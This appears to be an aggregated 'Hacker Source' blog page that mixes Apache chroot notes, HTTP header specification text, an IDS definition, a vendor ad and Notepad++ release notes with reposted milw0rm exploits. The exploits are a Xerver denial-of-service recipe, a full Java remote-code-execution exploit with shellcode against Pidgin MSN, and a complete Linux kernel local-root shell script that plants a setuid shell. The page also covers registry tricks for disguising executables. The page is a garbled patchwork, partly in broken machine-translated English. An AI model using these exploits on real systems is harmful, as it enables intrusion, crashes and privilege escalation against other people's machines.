Hacker Source

This guide explains how to set up mod_chroot with Apache2 on a Fedora 12 system. With mod_chroot, you can run Apache2 in a secure chroot environment and make your server less vulnerable to break-in attempts that try to exploit vulnerabilities in Apache2 or your installed web applications. I do not issue any guarantee that this will work for you!

Preliminary Note

I'm assuming that you have a running Fedora 12 system with a working Apache2, e.g. as shown in this tutorial: The Perfect Server - Fedora 12 x86_64 [ISPConfig 2]. In addition to that I assume that you have one or more web sites set up within the /var/www directory (e.g. if you use ISPConfig).

Source and read this full article at HowToForge

Header Field Definitions
This section defines the syntax and semantics of all standard HTTP/1.1 header fields. For entity-header fields, both sender and recipient refer to either the client or the server, depending on who sends and who receives the entity.
Accept

The Accept request-header field can be used to specify certain media types which are acceptable for the response. Accept headers can be used to indicate that the request is specifically limited to a small set of desired types, as in the case of a request for an in-line image.

Accept = "Accept" ":"
#( media-range [ accept-params ] )
media-range = ( "*/*"
| ( type "/" "*" )
| ( type "/" subtype )
) *( ";" parameter )
accept-params = ";" "q" "=" qvalue *( accept-extension )
accept-extension = ";" token [ "=" ( token | quoted-string ) ]

The asterisk "*" character is used to group media types into ranges, with "*/*" indicating all media types and "type/*" indicating all subtypes of that type. The media-range MAY include media type parameters that are applicable to that range.
Each media-range MAY be followed by one or more accept-params, beginning with the "q" parameter for indicating a relative quality factor. The first "q" parameter (if any) separates the media-range parameter(s) from the accept-params. Quality factors allow the user or user agent to indicate the relative degree of preference for that media-range, using the qvalue scale from 0 to 1. The default value is q=1.

Note: Use of the "q" parameter name to separate media type
parameters from Accept extension parameters is due to historical
practice. Although this prevents any media type parameter named
"q" from being used with a media range, such an event is believed
to be unlikely given the lack of any "q" parameters in the IANA
media type registry and the rare usage of any media type
parameters in Accept. Future media types are discouraged from
registering any parameter named "q".

The example

Accept: audio/*; q=0.2, audio/basic

SHOULD be interpreted as "I prefer audio/basic, but send me any audio type if it is the best available after an 80% mark-down in quality."
If no Accept header field is present, then it is assumed that the client accepts all media types. If an Accept header field is present, and if the server cannot send a response which is acceptable according to the combined Accept field value, then the server SHOULD send a 406 (not acceptable) response.
A more elaborate example is

Accept: text/plain; q=0.5, text/html,
text/x-dvi; q=0.8, text/x-c

Verbally, this would be interpreted as "text/html and text/x-c are the preferred media types, but if they do not exist, then send the text/x-dvi entity, and if that does not exist, send the text/plain entity."
Media ranges can be overridden by more specific media ranges or specific media types. If more than one media range applies to a given type, the most specific reference has precedence. For example,

Accept: text/*, text/html, text/html;level=1, */*

have the following precedence:

1) text/html;level=1
2) text/html
3) text/*
4) */*

The media type quality factor associated with a given type is determined by finding the media range with the highest precedence which matches that type. For example,

Accept: text/*;q=0.3, text/html;q=0.7, text/html;level=1,
text/html;level=2;q=0.4, */*;q=0.5

would cause the following values to be associated:

text/html;level=1 = 1
text/html = 0.7
text/plain = 0.3
image/jpeg = 0.5
text/html;level=2 = 0.4
text/html;level=3 = 0.7

Note: A user agent might be provided with a default set of quality
values for certain media ranges. However, unless the user agent is
a closed system which cannot interact with other rendering agents,
this default set ought to be configurable by the user.

Source and keep reading

Download via Ziddu Mirror

An intrusion detection system (IDS) is a device (or application) that monitors network and/or system activities for malicious activities or policy violations.
Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents, which are violations or imminent threats of violation of computer security policies, acceptable use policies, or standard security practices. Intrusion prevention is the process of performing intrusion detection and attempting to stop detected possible incidents. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators. In addition, organizations use IDPSs for other purposes, such as identifying problems with security policies, documenting existing threats, and deterring individuals from violating security policies. IDPSs have become a necessary addition to the security infrastructure of nearly every organization.

IDPSs typically record information related to observed events, notify security administrators of important observed events, and produce reports. Many IDPSs can also respond to a detected threat by attempting to prevent it from succeeding.They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g., reconfiguring a firewall), or changing the attack’s content.

Source

Automate Your Penetration Testing

AVDS is a network vulnerability assessment appliance for networks of 50 to 200,000 nodes. It performs an in-depth inspection for security weaknesses that can replace exhaustive penetration testing. With each scan it will automatically find new equipment and services and add them to the inspection schedule. It then tests every node based on its characteristics and records your system's responses.

In a matter of hours and with no network down time or interruption of services AVDS will generate detailed reports specifying network security weaknesses.

Our database of tests is updated daily with the most recently discovered security vulnerabilities. The AVDS database includes over 10,000 known vulnerabilities and the updates include discoveries by our own team and those discovered by corporate and private security teams around the world.

Simple, Fast and Comprehensive

Manual vulnerability assessment is expensive and infrequently done. Assessment software can be time consuming to set up and operate, plagued by high false positive rates and cause network resource issues.

Automated Testing Using AVDS:
• Gets your tactical security work done routinely and quickly
• Provides the fixes you and your staff need for fast mitigation
• Buys you time to focus on security strategy
• Automatically scans new equipment, ports and applications
• Scales to handle multiple networks, business units, countries
• Reduces your patch-work by identifying exactly what is needed.

Security and Compliance Challenges
Read More

Xerver v4.32 is a Windows based HTTP server. This is the latest version of
the application available.

Xerver v4.32 is vulnerable to a remote denial of service through following means.

Xerver ships with a web based configuration program, essentially making this DoS
remote if and when the Remote Setup is running.

The admin package runs on port 32123 and does not require any form of
authentication to make changes to the server configuration.

- Bug -

If the HTTP Server port is set to any kind of letter combination, the server will
crash and be unable to be restarted unless the configuration file is manually
edited to remove the letters and put back to a number (ie. 80).

- Example -

1. http://172.16.2.101:32123/?action=wizardStep1
2. Enter anything in the port field, "Dr_IDE"
3. Click Save and Continue

- Results -

The server will crash hard, and you will be unable to restart it. You must edit the
configuration file, Xerver2.cfg and replace the first line of the file with a Port
number.

- Note -

I tried to make this a possible XSS attack but I couldn't manage. Perhaps someone
else can figure it out.

Methods and variables of interest for this attack:

SubmitForm()
document.myForm.portNR.value="80" # default, any letters here would kill the server

source milw0rm.com

Pidgin MSN <= 2.5.8 Remote Code Execution

Pierre Nogues - pierz@hotmail.it
http://www.indahax.com/

Description:
Pidgin is a multi-protocol Instant Messenger.

This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
which could lead to memory corruption.

Affected versions :
Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.

Plateforms :
Windows, Linux, Mac

Fix :
Fixed in Pidgin 2.5.9
Update to the latest version : http://www.pidgin.im/download/

References :
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
[2] http://www.coresecurity.com/content/libpurple-arbitrary-write
[3] http://www.pidgin.im/news/security/?id=34

Usage :
You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
download source code, click here

import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;

public class PidginExploit {

private MsnMessenger messenger;
private String login;
private String password;
private String target;

private int session_id = NumberUtils.getIntRandom();

private byte shellcode[] = new byte[] {

/*
* if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,


/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
(byte) 0x00
};

// reteip = pointer to the return address in the stack
// The shellcode will be wrote just before reteip
// and reteip will automaticly point to the shellcode. It's magic !
private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8

private int neweip;
private byte[] payload = new byte[shellcode.length + 4];
private int totallength = reteip + 4;

public static void main(String[] args) throws Exception {

if(args.length != 3){
System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}

}

public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;

neweip = reteip - shellcode.length ;

for(int i=0;i payload[i] = shellcode[i];

payload[shellcode.length] = (byte)(neweip & 0x000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}

public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);

messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);

initMessenger(messenger);
messenger.login();
}

protected void initMessenger(MsnMessenger messenger) {

messenger.addContactListListener(new MsnContactListAdapter() {

public void contactListInitCompleted(MsnMessenger messenger) {

final Object id = new Object();

messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {

public void switchboardStarted(MsnSwitchboard switchboard) {

if (id != switchboard.getAttachment())
return;

switchboard.inviteContact(Email.parseStr(target));
}

public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;

MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);

// This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
// We'll use this buffer to rewrite memory in the stack
msg.setFlag(0x1000020);

msg.setP2PDest(target);

switchboard.sendMessage(msg);

System.out.println("First packet sent, waiting for the ACK");

}

public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println("switchboardClosed");
switchboard.getMessenger().removeSwitchboardListener(this);
}

public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println("contactLeaveSwitchboard");
}
});
messenger.newSwitchboard(id);
}
});

messenger.addMessageListener(new MsnMessageAdapter(){

public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {

//We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();

MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);

switchboard.sendMessage(msg);
System.out.println("ACK received && Payload sent !");
System.out.println("Exploit OK ! CTRL+C to quit");

}
});



messenger.addMessengerListener(new MsnMessengerAdapter() {

public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " login");
}

public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " logout");
}

public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println("caught exception: " + throwable);
}
});

}
}

// Original source milw0rm.com [2009-09-09]

Need more Computer and Internet security click here

FIXES
Notepad++ v5.4.5 fixed bugs (from v5.4.4)
1. Fix plugins shortcuts not working bug.
2. Fix the tooltip on toolbar display bug for the plugins icons.
3. Fix a crash that was occurring when searching in files from a deep path.
4. Fix a crash issue (Unicode binary) while close Notepad++ with an RC file opened under Chinese Xp.
5. Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml).
6. Add SQL folding capacity.

source milw0rm.com

download source code, click here

Need register_globals = on and magic_quotes_gpc = off
Based on vulnerabilities discussed at http://www.milw0rm.org/exploits/8713
Coppermine Photo Gallery 1.4.22 Remote Exploit

Coded by girex

source. milw0rm

download

Need computer and internet security, click here

Note from the author: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section with my permission. However, because this is a living document I suggest you continue to use this site to stay up to date.

Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page, however, if you have specific concerns about outdated or obscure versions please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader feel free to subscribe to the Web Application Security RSS feed below, or join the forum

source. RSnake

Download Cheat Sheet, click here

hacker safe

#!/bin/sh


# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit
#
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)
#
# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov.
# Basically it allows us to send arbitrary signals to a privileged (suidroot)
# parent process. Due to a bad check, the child process with appropriate exit signal
# already set can first execute a suidroot binary then exit() and thus bypass
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.
#
# !!!!!!!!!!!
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0
# so you'll be out of luck most of the time.
# So it is not going to be the script kiddies' new killer shit :-)
# !!!!!!!!!!!
#
# if you invent a better way to escalate privileges by sending arbitrary signals to
# the parent process, please mail me :) That was the best I could think of today :-(
#
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness
#
# Skuchna rabota...
#
####################################################################################

hacker safe



SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi
if [ -d /etc/logrotate.d ]; then
echo "logrotate installed, that's good!"
else
echo "No logrotate installed, sorry!";exit
fi

echo -e "Compiling the bash setuid() wrapper..."
cat >> /tmp/.m.c << EOF
#include
#include

int main()
{
setuid(0);
execl("/bin/bash","[kthreadd]",NULL);
}
EOF

cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c

echo -e "Compiling the exploit code..."

cat >> /tmp/exploit.c << EOF
#include
#include
#include
#include
#include

int child(void *data)
{
sleep(2);
printf("I'm gonna kill the suidroot father without having root rights :D\n");
execl("/usr/bin/gpasswd","%s",NULL);
exit(0);
}

int main()
{
int stacksize = 4*getpagesize();
void *stack, *stacktop;
stack = malloc(stacksize);
stacktop = stack + stacksize;
chdir("/etc/logrotate.d");
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF

cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c

echo -e "Setting coredump limits and running the exploit...\n"
ulimit -c 10000
touch /tmp/.a
`/tmp/.ex >/dev/null 2>/dev/null`
sleep 5
rm /tmp/.ex

if [ -e /etc/logrotate.d/core ]; then
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"
echo -e "\nYour terminal is most probably screwed now, sorry for that..."
exit
fi

echo "The system is not vulnerable, sorry :("

# milw0rm.com [2009-04-08]
hacker safe

There are some the matters require to in knowing:
Malware ( abbreviation of term English Ianguage ) malicious software, meaning the compromising software) is the computer program created for the purpose of and specific-purpose of his creator and is the program look for weakness from software. Generally malware created to leak or destroy a software or system operasi.(Wiki).

Badware is malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. If your every move online is checked by a pop-up ad, it's highly likely that you, like 59 million Americans, have spyware or other malicious badware on your computer.(Stopbadware.org)

Google as search engine biggest in world wish to give the result search the cleanness and peaceful to searcher that good from side website and seo, special so for the things from side website, google besides doing crawl he/she also do scanning to website do website the contain script which including category malware/badware or don't.

In the activity google work along with stopbadware.org to give the information to:
Administrator(Suspect website) usually google will deliver the enamel to:

buse@website com
admin@website.com
administrator@website.com
contact@website.com
info@website.com *

so that you require to make one of the above enamel for precaution to catch the information in delivering by google, if website you is hit Label Malware.
They also inform to public society ( consumer Google Search), that website the contain Malware, by presenting be like this



Cause:
One of [the] process entry of malware/badware into website you can in causing by existence of virus in your computer, moment update website ( upload file php or html) that good through FTP or Browser hence virus will injection some script malware/badware into page website without you realize before all, so that when google do scanning and find script malware/badware is in website you is hence google will direct give Label Badware/Malware in SERP their.
They also inform to public society ( consumer Google Search), that website the contain Malware.

Way to overcome:

To overcome / to eliminate Label Badware/Malware in SERP Google, hence you require to do some matters is :
1. Do the sweeping script malware/badware [at] script website your
2. Ask review on the side of stopbadware.org
3. Ask review side Google

Special to poin which to 3. that is requesting review side of Google, its way is

1. You have to have account in google, can in the form of enamel in google.

2. Step into http://google.com/accounts select;choose Webmaster / Webmaster Tools
3. If the menu not shown was hence you had to enlist in google webmaster tools formerly.
4. Register website you is in google webmaster tools then do the verification / verify
5. After that verify please enter the menu Overview and click link Review site

Awaited 2 x 24 Jam, [stopbadware.org will review your website and if website you truely have clear of malware/badware hence they will contact google, then Google will do review directly.

After they express website you really clean hence Label Badware/Malware in SERP Google will soon in eliminating, usually process the abolition Label this eat the time of 1x24 [hour/clock]... patient thus yes.... :)

Such as we know windows only recognizing some file type fruits executable newly, that is the file exe, com, scr, and pif. How if we will make extension file executable newly, for example extension ext( for example his file name : Anti. ext and nature of his file be like file Anti.exe). Usefulness of this technique is so that black out the program to file exe, scr, and com can be overcome. So that if file exe be like msconfig.exe blacked out because extension exe, hence we fixed can run the program msconfig the by changing extension, for example becoming msconfig.ext

To make the matter be like this easy very, we are only require to enter key newly into registry, for example extension ext which be like file exe, hence file reg yg enterred is :


Windows Registry Editor Version 5.00
[ HKEY_CLASSES_ROOT\.EVA]
@=" exefile"

Become his format is :
Windows Registry Editor Version 5.00
[ HKEY_CLASSES_ROOT\.EKSTENSIBARU]
@=" exefile" to be like file exe
@=" scrfile" to be like file scr

Is while to be like file com, hence have to be entered also in file regi key PersistentHandler This technique can is also used by virus to system his defence in computer, that is with :

. 1. Change handling of file dangerous, for example binding file jpg exefile, whereas virus file fixed fasten ( join forces) file jpg in fact, without changing extension file, is while substitution extension for file draw jpg is extension will different, for example tmp

. 2. Incognito to become the file which similar with file undangerous so that difficult detected for example virus for file extension d11 at first sight look like with dll ekstensi etc.

Note :

To alter, for example file scr before all use the program wafting icon alone, we wish the file scr use the icon from outside, for example property windows without compiling again file scr, hence we require to changing value registry, at key :

[ HKEY_CLASSES_ROOT\SCRFILE]
that is in :
Value DefaultIcon from % 1 becoming, for example :: % Systemroot%\System32\Shell32.Dll,-154